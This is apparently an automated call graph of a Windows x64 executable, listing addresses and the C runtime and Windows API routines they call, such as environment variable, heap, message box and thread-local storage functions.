7ff6ceb23fac 16319->16320 17161 7ff6ceb24340 16320->17161 16324 7ff6ceb27d7a 16323->16324 16325 7ff6ceb28de0 57 API calls 16324->16325 16326 7ff6ceb27d9c GetEnvironmentVariableW 16325->16326 16327 7ff6ceb27e06 16326->16327 16328 7ff6ceb27db4 ExpandEnvironmentStringsW 16326->16328 16330 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16327->16330 16329 7ff6ceb28ef0 59 API calls 16328->16329 16332 7ff6ceb27ddc 16329->16332 16331 7ff6ceb27e18 16330->16331 16331->16166 16332->16327 16333 7ff6ceb27de6 16332->16333 17176 7ff6ceb3b1bc 16333->17176 16336 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16337 7ff6ceb27dfe 16336->16337 16337->16166 16339 7ff6ceb28de0 57 API calls 16338->16339 16340 7ff6ceb28267 SetEnvironmentVariableW 16339->16340 16341 7ff6ceb2827f __std_exception_destroy 16340->16341 16341->16170 16343 7ff6ceb21cae 16342->16343 16344 7ff6ceb21ee0 49 API calls 16343->16344 16345 7ff6ceb21ce4 16344->16345 16346 7ff6ceb21dce 16345->16346 16347 7ff6ceb21ee0 49 API calls 16345->16347 16348 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16346->16348 16349 7ff6ceb21d0a 16347->16349 16350 7ff6ceb21e5c 16348->16350 16349->16346 17183 7ff6ceb21a90 16349->17183 16350->16174 16350->16175 16354 7ff6ceb21dbc 16355 7ff6ceb23e80 49 API calls 16354->16355 16355->16346 16356 7ff6ceb21d7f 16356->16354 16357 7ff6ceb21e24 16356->16357 16358 7ff6ceb23e80 49 API calls 16357->16358 16359 7ff6ceb21e31 16358->16359 17219 7ff6ceb24140 16359->17219 16362 7ff6ceb28b95 16361->16362 17261 7ff6ceb28860 GetCurrentProcess OpenProcessToken 16362->17261 16365 7ff6ceb28860 7 API calls 16366 7ff6ceb28bc1 16365->16366 16367 7ff6ceb28bda 16366->16367 16368 7ff6ceb28bf4 16366->16368 17271 7ff6ceb28950 16367->17271 16370 7ff6ceb28950 48 API calls 16368->16370 16372 7ff6ceb28c07 LocalFree LocalFree 16370->16372 16373 7ff6ceb28c23 16372->16373 16375 7ff6ceb28c2f 16372->16375 17275 7ff6ceb22c30 16373->17275 16376 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16375->16376 16377 7ff6ceb23b4e 16376->16377 16377->16190 16378 7ff6ceb214e0 16377->16378 16379 7ff6ceb214f6 16378->16379 16382 7ff6ceb2156f 16378->16382 17482 7ff6ceb27b60 16379->17482 16382->16176 16386 7ff6ceb28e87 MultiByteToWideChar 16385->16386 16387 7ff6ceb28e01 MultiByteToWideChar 16385->16387 16388 7ff6ceb28eaa 16386->16388 16389 7ff6ceb28ecf 16386->16389 16390 7ff6ceb28e27 16387->16390 16391 7ff6ceb28e4c 16387->16391 16393 7ff6ceb229c0 55 API calls 16388->16393 16389->16184 16392 7ff6ceb229c0 55 API calls 16390->16392 16391->16386 16396 7ff6ceb28e62 16391->16396 16394 7ff6ceb28e3a 16392->16394 16395 7ff6ceb28ebd 16393->16395 16394->16184 16395->16184 16397 7ff6ceb229c0 55 API calls 16396->16397 16398 7ff6ceb28e75 16397->16398 16398->16184 16400 7ff6ceb27005 16399->16400 16401 7ff6ceb22870 59 API calls 16400->16401 16402 7ff6ceb23be0 16400->16402 16401->16402 16402->16224 16506 7ff6ceb26ca0 16402->16506 16407 7ff6ceb23513 16403->16407 16409 7ff6ceb23554 16403->16409 16404 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16405 7ff6ceb235a5 16404->16405 16405->16231 16410 7ff6ceb28b50 LocalFree 16405->16410 16407->16409 17814 7ff6ceb21700 16407->17814 17856 7ff6ceb22d50 16407->17856 16409->16404 16410->16216 16412 7ff6ceb28de0 57 API calls 16411->16412 16413 7ff6ceb281ff 16412->16413 16414 7ff6ceb28de0 57 API calls 16413->16414 16415 7ff6ceb2820f 16414->16415 16416 7ff6ceb38610 38 API calls 16415->16416 16417 7ff6ceb2821d __std_exception_destroy 16416->16417 16417->16222 16462 7ff6ceb22b30 16461->16462 16463 7ff6ceb352b4 49 API calls 16462->16463 16464 7ff6ceb22b7b __scrt_get_show_window_mode 16463->16464 16465 7ff6ceb28de0 57 API calls 16464->16465 16466 7ff6ceb22bb0 16465->16466 16467 7ff6ceb22bed MessageBoxA 16466->16467 16468 7ff6ceb22bb5 16466->16468 16470 7ff6ceb22c07 16467->16470 16469 7ff6ceb28de0 57 API calls 16468->16469 16471 7ff6ceb22bcf MessageBoxW 16469->16471 16472 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16470->16472 16471->16470 16473 7ff6ceb22c17 16472->16473 16473->16231 16475 7ff6ceb2406c 16474->16475 16476 7ff6ceb28de0 57 API calls 16475->16476 16477 7ff6ceb24097 16476->16477 16478 7ff6ceb28de0 57 API calls 16477->16478 16479 7ff6ceb240aa 16478->16479 18384 7ff6ceb369e4 16479->18384 16482 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16483 7ff6ceb23acd 16482->16483 16483->16194 16484 7ff6ceb284c0 16483->16484 16485 7ff6ceb284e4 16484->16485 16486 7ff6ceb285bb __std_exception_destroy 16485->16486 16487 7ff6ceb31004 73 API calls 16485->16487 16486->16199 16488 7ff6ceb284fe 16487->16488 16488->16486 18763 7ff6ceb39894 16488->18763 16494 7ff6ceb309ac 16493->16494 18778 7ff6ceb30758 16494->18778 16498 7ff6ceb2c019 16497->16498 16499 7ff6ceb23b73 16498->16499 16500 7ff6ceb2c070 IsProcessorFeaturePresent 16498->16500 16499->16242 16501 7ff6ceb2c088 16500->16501 18789 7ff6ceb2c264 RtlCaptureContext 16501->18789 16507 7ff6ceb26cda 16506->16507 16508 7ff6ceb26cc3 16506->16508 16507->16198 16508->16507 18794 7ff6ceb21590 16508->18794 16510 7ff6ceb26ce4 16510->16507 16511 7ff6ceb24140 49 API calls 16510->16511 16512 7ff6ceb26d45 16511->16512 16513 7ff6ceb22b10 59 API calls 16512->16513 16514 7ff6ceb26db5 __std_exception_destroy memcpy_s 16512->16514 16513->16507 16514->16198 16516 7ff6ceb2681a memcpy_s 16515->16516 16517 7ff6ceb2693f 16516->16517 16520 7ff6ceb2695b 16516->16520 16523 7ff6ceb24140 49 API calls 16516->16523 16524 7ff6ceb26920 16516->16524 16532 7ff6ceb21700 135 API calls 16516->16532 16533 7ff6ceb26941 16516->16533 18818 7ff6ceb21940 16516->18818 16519 7ff6ceb24140 49 API calls 16517->16519 16521 7ff6ceb269b8 16519->16521 16522 7ff6ceb22b10 59 API calls 16520->16522 16525 7ff6ceb24140 49 API calls 16521->16525 16528 7ff6ceb26951 __std_exception_destroy 16522->16528 16523->16516 16524->16517 16526 7ff6ceb24140 49 API calls 16524->16526 16527 7ff6ceb269e8 16525->16527 16526->16517 16531 7ff6ceb24140 49 API calls 16527->16531 16529 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16528->16529 16530 7ff6ceb23c06 16529->16530 16530->16209 16535 7ff6ceb26780 16530->16535 16531->16528 16532->16516 16534 7ff6ceb22b10 59 API calls 16533->16534 16534->16528 18822 7ff6ceb28470 16535->18822 16537 7ff6ceb2679c 16538 7ff6ceb28470 58 API calls 16537->16538 16539 7ff6ceb267af 16538->16539 16540 7ff6ceb267e5 16539->16540 16542 7ff6ceb267c7 16539->16542 16541 7ff6ceb22b10 59 API calls 16540->16541 18826 7ff6ceb27100 GetProcAddress 16542->18826 16552 7ff6ceb21f05 16551->16552 16553 7ff6ceb352b4 49 API calls 16552->16553 16554 7ff6ceb21f28 16553->16554 16554->16217 18885 7ff6ceb25dd0 16555->18885 16558 7ff6ceb2348d 16558->16226 16608 7ff6ceb2bfb0 16589->16608 16592 7ff6ceb22a09 16610 7ff6ceb352b4 16592->16610 16597 7ff6ceb21ee0 49 API calls 16598 7ff6ceb22a66 __scrt_get_show_window_mode 16597->16598 16599 7ff6ceb28de0 54 API calls 16598->16599 16600 7ff6ceb22a9b 16599->16600 16601 7ff6ceb22ad8 MessageBoxA 16600->16601 16602 7ff6ceb22aa0 16600->16602 16604 7ff6ceb22af2 16601->16604 16603 7ff6ceb28de0 54 API calls 16602->16603 16605 7ff6ceb22aba MessageBoxW 16603->16605 16606 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16604->16606 16605->16604 16607 7ff6ceb22b02 16606->16607 16607->16290 16609 7ff6ceb229dc GetLastError 16608->16609 16609->16592 16611 7ff6ceb3530e 16610->16611 16612 7ff6ceb35333 16611->16612 16614 7ff6ceb3536f 16611->16614 16640 7ff6ceb3b5cc 16612->16640 16648 7ff6ceb33540 16614->16648 16616 7ff6ceb3535d 16617 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16616->16617 16619 7ff6ceb22a37 16617->16619 16618 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16618->16616 16628 7ff6ceb28770 16619->16628 16621 7ff6ceb35470 16622 7ff6ceb3547a 16621->16622 16627 7ff6ceb3544c 16621->16627 16625 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16622->16625 16624 7ff6ceb35418 16626 7ff6ceb35421 16624->16626 16624->16627 16625->16616 16662 7ff6ceb3b700 16626->16662 16627->16618 16629 7ff6ceb2877c 16628->16629 16630 7ff6ceb28797 GetLastError 16629->16630 16631 7ff6ceb2879d FormatMessageW 16629->16631 16630->16631 16632 7ff6ceb287ec WideCharToMultiByte 16631->16632 16633 7ff6ceb287d0 16631->16633 16635 7ff6ceb28826 16632->16635 16636 7ff6ceb287e3 16632->16636 16634 7ff6ceb229c0 54 API calls 16633->16634 16634->16636 16637 7ff6ceb229c0 54 API calls 16635->16637 16638 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16636->16638 16637->16636 16639 7ff6ceb22a3e 16638->16639 16639->16597 16668 7ff6ceb3b314 16640->16668 16646 7ff6ceb3b607 16646->16616 16649 7ff6ceb3357e 16648->16649 16650 7ff6ceb3356e 16648->16650 16651 7ff6ceb33587 16649->16651 16658 7ff6ceb335b5 16649->16658 16652 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16650->16652 16653 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16651->16653 16654 7ff6ceb335ad 16652->16654 16653->16654 16654->16621 16654->16624 16654->16626 16654->16627 16657 7ff6ceb33864 16660 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16657->16660 16658->16650 16658->16654 16658->16657 16760 7ff6ceb33ed0 16658->16760 16786 7ff6ceb33b98 16658->16786 16816 7ff6ceb33420 16658->16816 16819 7ff6ceb350f0 16658->16819 16660->16650 16663 7ff6ceb3b734 16662->16663 16664 7ff6ceb3b705 RtlRestoreThreadPreferredUILanguages 16662->16664 16663->16616 16664->16663 16665 7ff6ceb3b720 GetLastError 16664->16665 16666 7ff6ceb3b72d Concurrency::details::SchedulerProxy::DeleteThis 16665->16666 16667 7ff6ceb35cb4 _get_daylight 9 API calls 16666->16667 16667->16663 16669 7ff6ceb3b36b 16668->16669 16670 7ff6ceb3b330 GetLastError 16668->16670 16669->16646 16674 7ff6ceb3b380 16669->16674 16671 7ff6ceb3b340 16670->16671 16681 7ff6ceb3c140 16671->16681 16675 7ff6ceb3b39c GetLastError SetLastError 16674->16675 16676 7ff6ceb3b3b4 16674->16676 16675->16676 16676->16646 16677 7ff6ceb3b6b8 IsProcessorFeaturePresent 16676->16677 16678 7ff6ceb3b6cb 16677->16678 16752 7ff6ceb3b3cc 16678->16752 16682 7ff6ceb3c17a FlsSetValue 16681->16682 16683 7ff6ceb3c15f FlsGetValue 16681->16683 16685 7ff6ceb3c187 16682->16685 16686 7ff6ceb3b35b SetLastError 16682->16686 16684 7ff6ceb3c174 16683->16684 16683->16686 16684->16682 16698 7ff6ceb3f948 16685->16698 16686->16669 16689 7ff6ceb3c1b4 FlsSetValue 16692 7ff6ceb3c1c0 FlsSetValue 16689->16692 16693 7ff6ceb3c1d2 16689->16693 16690 7ff6ceb3c1a4 FlsSetValue 16691 7ff6ceb3c1ad 16690->16691 16694 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16691->16694 16692->16691 16705 7ff6ceb3bcac 16693->16705 16694->16686 16703 7ff6ceb3f959 _get_daylight 16698->16703 16699 7ff6ceb3f9aa 16713 7ff6ceb35cb4 16699->16713 16700 7ff6ceb3f98e RtlAllocateHeap 16701 7ff6ceb3c196 16700->16701 16700->16703 16701->16689 16701->16690 16703->16699 16703->16700 16710 7ff6ceb443e0 16703->16710 16738 7ff6ceb3bb84 16705->16738 16716 7ff6ceb44420 16710->16716 16721 7ff6ceb3c078 GetLastError 16713->16721 16715 7ff6ceb35cbd 16715->16701 16717 7ff6ceb411a8 _isindst EnterCriticalSection 16716->16717 16718 7ff6ceb4442d 16717->16718 16719 7ff6ceb41208 _isindst LeaveCriticalSection 16718->16719 16720 7ff6ceb443f2 16719->16720 16720->16703 16722 7ff6ceb3c0b9 FlsSetValue 16721->16722 16723 7ff6ceb3c09c 16721->16723 16724 7ff6ceb3c0cb 16722->16724 16735 7ff6ceb3c0a9 16722->16735 16723->16722 16723->16735 16726 7ff6ceb3f948 _get_daylight 5 API calls 16724->16726 16725 7ff6ceb3c125 SetLastError 16725->16715 16727 7ff6ceb3c0da 16726->16727 16728 7ff6ceb3c0f8 FlsSetValue 16727->16728 16729 7ff6ceb3c0e8 FlsSetValue 16727->16729 16731 7ff6ceb3c116 16728->16731 16732 7ff6ceb3c104 FlsSetValue 16728->16732 16730 7ff6ceb3c0f1 16729->16730 16733 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16730->16733 16734 7ff6ceb3bcac _get_daylight 5 API calls 16731->16734 16732->16730 16733->16735 16736 7ff6ceb3c11e 16734->16736 16735->16725 16737 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16736->16737 16737->16725 16750 7ff6ceb411a8 EnterCriticalSection 16738->16750 16753 7ff6ceb3b406 _wfindfirst32i64 __scrt_get_show_window_mode 16752->16753 16754 7ff6ceb3b42e RtlCaptureContext RtlLookupFunctionEntry 16753->16754 16755 7ff6ceb3b468 RtlVirtualUnwind 16754->16755 16756 7ff6ceb3b49e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16754->16756 16755->16756 16757 7ff6ceb3b4f0 _wfindfirst32i64 16756->16757 16758 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16757->16758 16759 7ff6ceb3b50f GetCurrentProcess TerminateProcess 16758->16759 16761 7ff6ceb33f85 16760->16761 16762 7ff6ceb33f12 16760->16762 16765 7ff6ceb33f8a 16761->16765 16766 7ff6ceb33fdf 16761->16766 16763 7ff6ceb33f18 16762->16763 16764 7ff6ceb33faf 16762->16764 16773 7ff6ceb33f1d 16763->16773 16777 7ff6ceb33fee 16763->16777 16843 7ff6ceb32480 16764->16843 16767 7ff6ceb33f8c 16765->16767 16768 7ff6ceb33fbf 16765->16768 16766->16764 16766->16777 16784 7ff6ceb33f48 16766->16784 16770 7ff6ceb33f2d 16767->16770 16776 7ff6ceb33f9b 16767->16776 16850 7ff6ceb32070 16768->16850 16785 7ff6ceb3401d 16770->16785 16825 7ff6ceb34834 16770->16825 16773->16770 16775 7ff6ceb33f60 16773->16775 16773->16784 16775->16785 16835 7ff6ceb34cf0 16775->16835 16776->16764 16779 7ff6ceb33fa0 16776->16779 16777->16785 16857 7ff6ceb32890 16777->16857 16779->16785 16839 7ff6ceb34e88 16779->16839 16780 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16782 7ff6ceb342b3 16780->16782 16782->16658 16784->16785 16864 7ff6ceb3f608 16784->16864 16785->16780 16787 7ff6ceb33bb9 16786->16787 16788 7ff6ceb33ba3 16786->16788 16789 7ff6ceb33bf7 16787->16789 16790 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16787->16790 16788->16789 16791 7ff6ceb33f85 16788->16791 16792 7ff6ceb33f12 16788->16792 16789->16658 16790->16789 16795 7ff6ceb33f8a 16791->16795 16800 7ff6ceb33fdf 16791->16800 16793 7ff6ceb33f18 16792->16793 16794 7ff6ceb33faf 16792->16794 16801 7ff6ceb33fee 16793->16801 16802 7ff6ceb33f1d 16793->16802 16797 7ff6ceb32480 38 API calls 16794->16797 16796 7ff6ceb33fbf 16795->16796 16799 7ff6ceb33f8c 16795->16799 16803 7ff6ceb32070 38 API calls 16796->16803 16814 7ff6ceb33f48 16797->16814 16798 7ff6ceb33f2d 16804 7ff6ceb34834 47 API calls 16798->16804 16815 7ff6ceb3401d 16798->16815 16799->16798 16806 7ff6ceb33f9b 16799->16806 16800->16794 16800->16801 16800->16814 16805 7ff6ceb32890 38 API calls 16801->16805 16801->16815 16802->16798 16807 7ff6ceb33f60 16802->16807 16802->16814 16803->16814 16804->16814 16805->16814 16806->16794 16809 7ff6ceb33fa0 16806->16809 16808 7ff6ceb34cf0 47 API calls 16807->16808 16807->16815 16808->16814 16811 7ff6ceb34e88 37 API calls 16809->16811 16809->16815 16810 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16812 7ff6ceb342b3 16810->16812 16811->16814 16812->16658 16813 7ff6ceb3f608 47 API calls 16813->16814 16814->16813 16814->16815 16815->16810 17022 7ff6ceb31644 16816->17022 16820 7ff6ceb35107 16819->16820 17039 7ff6ceb3e768 16820->17039 16826 7ff6ceb34856 16825->16826 16874 7ff6ceb314b0 16826->16874 16830 7ff6ceb34993 16833 7ff6ceb350f0 45 API calls 16830->16833 16834 7ff6ceb34a1c 16830->16834 16832 7ff6ceb350f0 45 API calls 16832->16830 16833->16834 16834->16784 16836 7ff6ceb34d08 16835->16836 16838 7ff6ceb34d70 16835->16838 16837 7ff6ceb3f608 47 API calls 16836->16837 16836->16838 16837->16838 16838->16784 16840 7ff6ceb34ea9 16839->16840 16841 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16840->16841 16842 7ff6ceb34eda 16840->16842 16841->16842 16842->16784 16844 7ff6ceb324b3 16843->16844 16845 7ff6ceb324e2 16844->16845 16847 7ff6ceb3259f 16844->16847 16846 7ff6ceb314b0 12 API calls 16845->16846 16849 7ff6ceb3251f 16845->16849 16846->16849 16848 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16847->16848 16848->16849 16849->16784 16851 7ff6ceb320a3 16850->16851 16852 7ff6ceb320d2 16851->16852 16854 7ff6ceb3218f 16851->16854 16853 7ff6ceb314b0 12 API calls 16852->16853 16856 7ff6ceb3210f 16852->16856 16853->16856 16855 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16854->16855 16855->16856 16856->16784 16858 7ff6ceb328c3 16857->16858 16859 7ff6ceb328f2 16858->16859 16861 7ff6ceb329af 16858->16861 16860 7ff6ceb314b0 12 API calls 16859->16860 16863 7ff6ceb3292f 16859->16863 16860->16863 16862 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16861->16862 16862->16863 16863->16784 16865 7ff6ceb3f630 16864->16865 16866 7ff6ceb3f675 16865->16866 16867 7ff6ceb350f0 45 API calls 16865->16867 16869 7ff6ceb3f65e __scrt_get_show_window_mode 16865->16869 16871 7ff6ceb3f635 __scrt_get_show_window_mode 16865->16871 16866->16869 16866->16871 17019 7ff6ceb41640 16866->17019 16867->16866 16868 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16868->16871 16869->16868 16869->16871 16871->16784 16875 7ff6ceb314e7 16874->16875 16881 7ff6ceb314d6 16874->16881 16875->16881 16904 7ff6ceb3e3ac 16875->16904 16877 7ff6ceb31528 16880 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16877->16880 16879 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16879->16877 16880->16881 16882 7ff6ceb3f320 16881->16882 16883 7ff6ceb3f33d 16882->16883 16884 7ff6ceb3f370 16882->16884 16885 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16883->16885 16884->16883 16886 7ff6ceb3f3a2 16884->16886 16901 7ff6ceb34971 16885->16901 16890 7ff6ceb3f4b5 16886->16890 16896 7ff6ceb3f3ea 16886->16896 16887 7ff6ceb3f5a7 16944 7ff6ceb3e80c 16887->16944 16889 7ff6ceb3f56d 16937 7ff6ceb3eba4 16889->16937 16890->16887 16890->16889 16891 7ff6ceb3f53c 16890->16891 16893 7ff6ceb3f4ff 16890->16893 16895 7ff6ceb3f4f5 16890->16895 16930 7ff6ceb3ee84 16891->16930 16920 7ff6ceb3f0b4 16893->16920 16895->16889 16898 7ff6ceb3f4fa 16895->16898 16896->16901 16911 7ff6ceb3b25c 16896->16911 16898->16891 16898->16893 16901->16830 16901->16832 16902 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 16903 7ff6ceb3f604 16902->16903 16905 7ff6ceb3e3f7 16904->16905 16909 7ff6ceb3e3bb _get_daylight 16904->16909 16907 7ff6ceb35cb4 _get_daylight 11 API calls 16905->16907 16906 7ff6ceb3e3de RtlAllocateHeap 16908 7ff6ceb31514 16906->16908 16906->16909 16907->16908 16908->16877 16908->16879 16909->16905 16909->16906 16910 7ff6ceb443e0 _get_daylight 2 API calls 16909->16910 16910->16909 16912 7ff6ceb3b269 16911->16912 16913 7ff6ceb3b273 16911->16913 16912->16913 16918 7ff6ceb3b28e 16912->16918 16914 7ff6ceb35cb4 _get_daylight 11 API calls 16913->16914 16915 7ff6ceb3b27a 16914->16915 16953 7ff6ceb3b698 16915->16953 16917 7ff6ceb3b286 16917->16901 16917->16902 16918->16917 16919 7ff6ceb35cb4 _get_daylight 11 API calls 16918->16919 16919->16915 16955 7ff6ceb44efc 16920->16955 16924 7ff6ceb3f15c 16925 7ff6ceb3f1b1 16924->16925 16927 7ff6ceb3f17c 16924->16927 16929 7ff6ceb3f160 16924->16929 17008 7ff6ceb3eca0 16925->17008 16927->16927 17004 7ff6ceb3ef5c 16927->17004 16929->16901 16931 7ff6ceb44efc 38 API calls 16930->16931 16932 7ff6ceb3eece 16931->16932 16933 7ff6ceb44944 37 API calls 16932->16933 16934 7ff6ceb3ef1e 16933->16934 16935 7ff6ceb3ef22 16934->16935 16936 7ff6ceb3ef5c 45 API calls 16934->16936 16935->16901 16936->16935 16938 7ff6ceb44efc 38 API calls 16937->16938 16939 7ff6ceb3ebef 16938->16939 16940 7ff6ceb44944 37 API calls 16939->16940 16941 7ff6ceb3ec47 16940->16941 16942 7ff6ceb3ec4b 16941->16942 16943 7ff6ceb3eca0 45 API calls 16941->16943 16942->16901 16943->16942 16945 7ff6ceb3e851 16944->16945 16946 7ff6ceb3e884 16944->16946 16947 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16945->16947 16948 7ff6ceb3e89c 16946->16948 16950 7ff6ceb3e91d 16946->16950 16952 7ff6ceb3e87d __scrt_get_show_window_mode 16947->16952 16949 7ff6ceb3eba4 46 API calls 16948->16949 16949->16952 16951 7ff6ceb350f0 45 API calls 16950->16951 16950->16952 16951->16952 16952->16901 16954 7ff6ceb3b530 _invalid_parameter_noinfo 37 API calls 16953->16954 16956 7ff6ceb44f4f fegetenv 16955->16956 16957 7ff6ceb48e5c 37 API calls 16956->16957 16961 7ff6ceb44fa2 16957->16961 16958 7ff6ceb45092 16960 7ff6ceb48e5c 37 API calls 16958->16960 16959 7ff6ceb44fcf 16963 7ff6ceb3b25c __std_exception_copy 37 API calls 16959->16963 16962 7ff6ceb450bc 16960->16962 16961->16958 16964 7ff6ceb44fbd 16961->16964 16965 7ff6ceb4506c 16961->16965 16966 7ff6ceb48e5c 37 API calls 16962->16966 16967 7ff6ceb4504d 16963->16967 16964->16958 16964->16959 16968 7ff6ceb3b25c __std_exception_copy 37 API calls 16965->16968 16969 7ff6ceb450cd 16966->16969 16970 7ff6ceb46174 16967->16970 16975 7ff6ceb45055 16967->16975 16968->16967 16972 7ff6ceb49050 20 API calls 16969->16972 16971 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 16970->16971 16973 7ff6ceb46189 16971->16973 16982 7ff6ceb45136 __scrt_get_show_window_mode 16972->16982 16974 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16976 7ff6ceb3f101 16974->16976 16975->16974 17000 7ff6ceb44944 16976->17000 16977 7ff6ceb454df __scrt_get_show_window_mode 16978 7ff6ceb4581f 16979 7ff6ceb44a60 37 API calls 16978->16979 16989 7ff6ceb45f37 16979->16989 16980 7ff6ceb457cb 16980->16978 16983 7ff6ceb4618c memcpy_s 37 API calls 16980->16983 16981 7ff6ceb45177 memcpy_s 16987 7ff6ceb45abb memcpy_s __scrt_get_show_window_mode 16981->16987 16988 7ff6ceb455d3 memcpy_s __scrt_get_show_window_mode 16981->16988 16982->16977 16982->16981 16984 7ff6ceb35cb4 _get_daylight 11 API calls 16982->16984 16983->16978 16986 7ff6ceb455b0 16984->16986 16985 7ff6ceb45f92 16991 7ff6ceb46118 16985->16991 16996 7ff6ceb44a60 37 API calls 16985->16996 16998 7ff6ceb4618c memcpy_s 37 API calls 16985->16998 16990 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 16986->16990 16987->16978 16987->16980 16993 7ff6ceb35cb4 11 API calls _get_daylight 16987->16993 16999 7ff6ceb3b698 37 API calls _invalid_parameter_noinfo 16987->16999 16988->16980 16994 7ff6ceb35cb4 11 API calls _get_daylight 16988->16994 16997 7ff6ceb3b698 37 API calls _invalid_parameter_noinfo 16988->16997 16989->16985 16992 7ff6ceb4618c memcpy_s 37 API calls 16989->16992 16990->16981 16995 7ff6ceb48e5c 37 API calls 16991->16995 16992->16985 16993->16987 16994->16988 16995->16975 16996->16985 16997->16988 16998->16985 16999->16987 17001 7ff6ceb44963 17000->17001 17002 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17001->17002 17003 7ff6ceb4498e memcpy_s 17001->17003 17002->17003 17003->16924 17003->17003 17005 7ff6ceb3ef88 memcpy_s 17004->17005 17006 7ff6ceb350f0 45 API calls 17005->17006 17007 7ff6ceb3f042 memcpy_s __scrt_get_show_window_mode 17005->17007 17006->17007 17007->16929 17009 7ff6ceb3ecdb 17008->17009 17013 7ff6ceb3ed28 memcpy_s 17008->17013 17010 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17009->17010 17011 7ff6ceb3ed07 17010->17011 17011->16929 17012 7ff6ceb3ed93 17014 7ff6ceb3b25c __std_exception_copy 37 API calls 17012->17014 17013->17012 17015 7ff6ceb350f0 45 API calls 17013->17015 17018 7ff6ceb3edd5 memcpy_s 17014->17018 17015->17012 17016 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 17017 7ff6ceb3ee80 17016->17017 17018->17016 17021 7ff6ceb41664 WideCharToMultiByte 17019->17021 17023 7ff6ceb31671 17022->17023 17024 7ff6ceb31683 17022->17024 17025 7ff6ceb35cb4 _get_daylight 11 API calls 17023->17025 17027 7ff6ceb31690 17024->17027 17030 7ff6ceb316cd 17024->17030 17026 7ff6ceb31676 17025->17026 17028 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17026->17028 17029 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17027->17029 17035 7ff6ceb31681 17028->17035 17029->17035 17031 7ff6ceb31776 17030->17031 17033 7ff6ceb35cb4 _get_daylight 11 API calls 17030->17033 17032 7ff6ceb35cb4 _get_daylight 11 API calls 17031->17032 17031->17035 17034 7ff6ceb31820 17032->17034 17036 7ff6ceb3176b 17033->17036 17037 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17034->17037 17035->16658 17038 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17036->17038 17037->17035 17038->17031 17040 7ff6ceb3512f 17039->17040 17041 7ff6ceb3e781 17039->17041 17043 7ff6ceb3e7d4 17040->17043 17041->17040 17047 7ff6ceb44154 17041->17047 17044 7ff6ceb3e7ed 17043->17044 17045 7ff6ceb3513f 17043->17045 17044->17045 17091 7ff6ceb434a0 17044->17091 17045->16658 17059 7ff6ceb3bf00 GetLastError 17047->17059 17050 7ff6ceb441ae 17050->17040 17060 7ff6ceb3bf41 FlsSetValue 17059->17060 17061 7ff6ceb3bf24 FlsGetValue 17059->17061 17063 7ff6ceb3bf53 17060->17063 17078 7ff6ceb3bf31 17060->17078 17062 7ff6ceb3bf3b 17061->17062 17061->17078 17062->17060 17065 7ff6ceb3f948 _get_daylight 11 API calls 17063->17065 17064 7ff6ceb3bfad SetLastError 17067 7ff6ceb3bfcd 17064->17067 17068 7ff6ceb3bfba 17064->17068 17066 7ff6ceb3bf62 17065->17066 17069 7ff6ceb3bf80 FlsSetValue 17066->17069 17070 7ff6ceb3bf70 FlsSetValue 17066->17070 17082 7ff6ceb3b2bc 17067->17082 17068->17050 17081 7ff6ceb411a8 EnterCriticalSection 17068->17081 17073 7ff6ceb3bf8c FlsSetValue 17069->17073 17074 7ff6ceb3bf9e 17069->17074 17072 7ff6ceb3bf79 17070->17072 17076 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17072->17076 17073->17072 17077 7ff6ceb3bcac _get_daylight 11 API calls 17074->17077 17076->17078 17079 7ff6ceb3bfa6 17077->17079 17078->17064 17080 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17079->17080 17080->17064 17083 7ff6ceb444a0 __CxxCallCatchBlock EnterCriticalSection LeaveCriticalSection 17082->17083 17084 7ff6ceb3b2c5 17083->17084 17085 7ff6ceb3b2d4 17084->17085 17086 7ff6ceb444f0 __CxxCallCatchBlock 44 API calls 17084->17086 17087 7ff6ceb3b2dd IsProcessorFeaturePresent 17085->17087 17089 7ff6ceb3b307 